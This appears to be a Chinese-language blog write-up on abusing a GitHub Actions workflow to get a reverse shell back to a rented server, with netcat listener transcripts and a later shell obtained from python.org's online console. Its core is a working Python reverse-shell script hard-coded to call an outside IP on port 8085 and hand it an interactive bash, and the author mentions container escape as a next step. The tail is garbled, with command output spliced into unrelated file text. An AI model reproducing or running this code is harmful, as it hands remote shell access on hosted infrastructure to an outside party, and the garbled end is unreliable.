
在等待反弹 shell 的主机上执行

root@vultr:~# ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere                  
8085                       ALLOW       Anywhere                  
22/tcp (v6)                ALLOW       Anywhere (v6)             
8085 (v6)                  ALLOW       Anywhere (v6)             




root@vultr:~# nc -l -p 8085
bash: cannot set terminal process group (589): Inappropriate ioctl for device
bash: no job control in this shell
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ pwd
pwd
/home/runner/work/nuclei-wordfence-cve/nuclei-wordfence-cve
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ iip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 60:45:bd:4a:c9:12 brd ff:ff:ff:ff:ff:ff
    inet 10.1.1.36/16 metric 100 brd 10.1.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::6245:bdff:fe4a:c912/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:83:c1:f2:82 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ curl cip.cc
<lei-wordfence-cve/nuclei-wordfence-cve$ curl cip.cc                  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   148    0   148    0     0    202      0 --:--:-- --:--:-- --:--:--   202
IP	: 172.183.131.33
地址	: 美国  美国

数据二	: 美国 | AOL美国在线公司

数据三	: 美国

URL	: http://www.cip.cc/172.183.131.33

在 GitHub 上创建一个工作流并执行，例如让它运行下面这个 Python 脚本：

# Reverse shell as run from the GitHub Actions workflow in this write-up:
# the script dials OUT to a hard-coded listener (the `nc -l -p 8085` host
# shown above), then binds an interactive bash to that connection.
#
# There is no error handling anywhere: if the listener is down or the
# address is unreachable, socket.connect() raises (OSError/ConnectionError)
# and the job step simply fails with a traceback.
#
# Defender's view: the observable is a CI runner opening an unsolicited
# outbound TCP connection to an address outside the expected service set,
# immediately followed by /bin/bash whose stdin/stdout/stderr are that
# socket. Egress filtering on runners and alerting on shells spawned with
# socket-backed stdio are the corresponding controls.
import socket
import subprocess
import os

# Create a TCP (AF_INET, SOCK_STREAM) client socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the remote listener. Host and port are hard-coded; the port
# must match the one the listener is bound to (8085 in the transcript).
s.connect(("155.138.231.150", 8085))

# Replace this process's standard input, output and error with the socket,
# so anything the shell reads or writes goes over the connection.
os.dup2(s.fileno(), 0)  # standard input
os.dup2(s.fileno(), 1)  # standard output
os.dup2(s.fileno(), 2)  # standard error

# Spawn an interactive bash. The child inherits fds 0-2 (now the socket);
# subprocess.call() blocks until that bash exits, i.e. until the session ends.
subprocess.call(["/bin/bash", "-i"])

然后执行这个工作流，回到监听服务器上，就可以看到成功返回的会话了：

root@vultr:~# nc -l -p 8085
bash: cannot set terminal process group (589): Inappropriate ioctl for device
bash: no job control in this shell
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ pwd
pwd
/home/runner/work/nuclei-wordfence-cve/nuclei-wordfence-cve
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ iip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 60:45:bd:4a:c9:12 brd ff:ff:ff:ff:ff:ff
    inet 10.1.1.36/16 metric 100 brd 10.1.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::6245:bdff:fe4a:c912/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:83:c1:f2:82 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever

我发现github上面这个工作流是运行在一个docker容器里面,下一步如果想突破这个容器,那就涉及到容器逃逸了。

另外一个好玩的地方：访问这个网址 https://www.python.org/，

可以练习一下 Linux 基本命令：

Python 3.10.5 (main, Jul 22 2022, 17:09:35) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 
>>> import pty;pty.spawn("/bin/bash")
pwd07:35 ~ $ pwd
/home/.anon-ff70770a843e4faebfba6f2b
07:35 ~ $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 0a:ff:e9:4e:6c:53 brd ff:ff:ff:ff:ff:ff
    inet 10.0.4.86/23 metric 100 brd 10.0.5.255 scope global dynamic ens5
       valid_lft 2938sec preferred_lft 2938sec
    inet6 fe80::8ff:e9ff:fe4e:6c53/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:f8:81:30:7c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
07:35 ~ $ curl cip.cc
<HTML>
  <HEAD>
     Access Denied
  </HEAD>
<BODY>

<h1>Access Denied</h1>

<p>
Access to arbitrary websites is not available from free accounts;
you can only access sites that are on our
<a href="http://www.pythonanywhere.com/whitelist">allowlist</a>.
If you want to suggest something to add to our whitelist
drop us a line at PythonAnywhere Support <liveusercare@pythonanywhere.com>.  It will have
to have an official public API.
</p>


<p>
Alternatively, you can sign up for a paid account at
<a href="http://www.pythonanywhere.com/account/">http://www.pythonanywhere.com/account/</a>
</p>
<p>
If you have already got a paid account and you're still getting this messge,
you may need to reload your web app (from the "Web" tab) or restart
your consoles.  If that doesn't help, drop us a line at PythonAnywhere Support <liveusercare@pythonanywhere.com>.
</p>

</BODY>
07:37 ~ $ ping baidu.com
PING baidu.com (110.242.68.66) 56(84) bytes of data.
  5 # configured search domains.
  6 #
    link/ether 0a:ff:e9:4e:6c:53 brd ff:ff:ff:ff:ff:ff
#
# Third party programs must not access this file directly, but only through the
# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,
# replace this symlink by a static file or a different symlink.
#
# See man:systemd-resolved.service(8) for details about the supported modes of
# operation for /etc/resolv.conf.
nameserver 127.0.0.53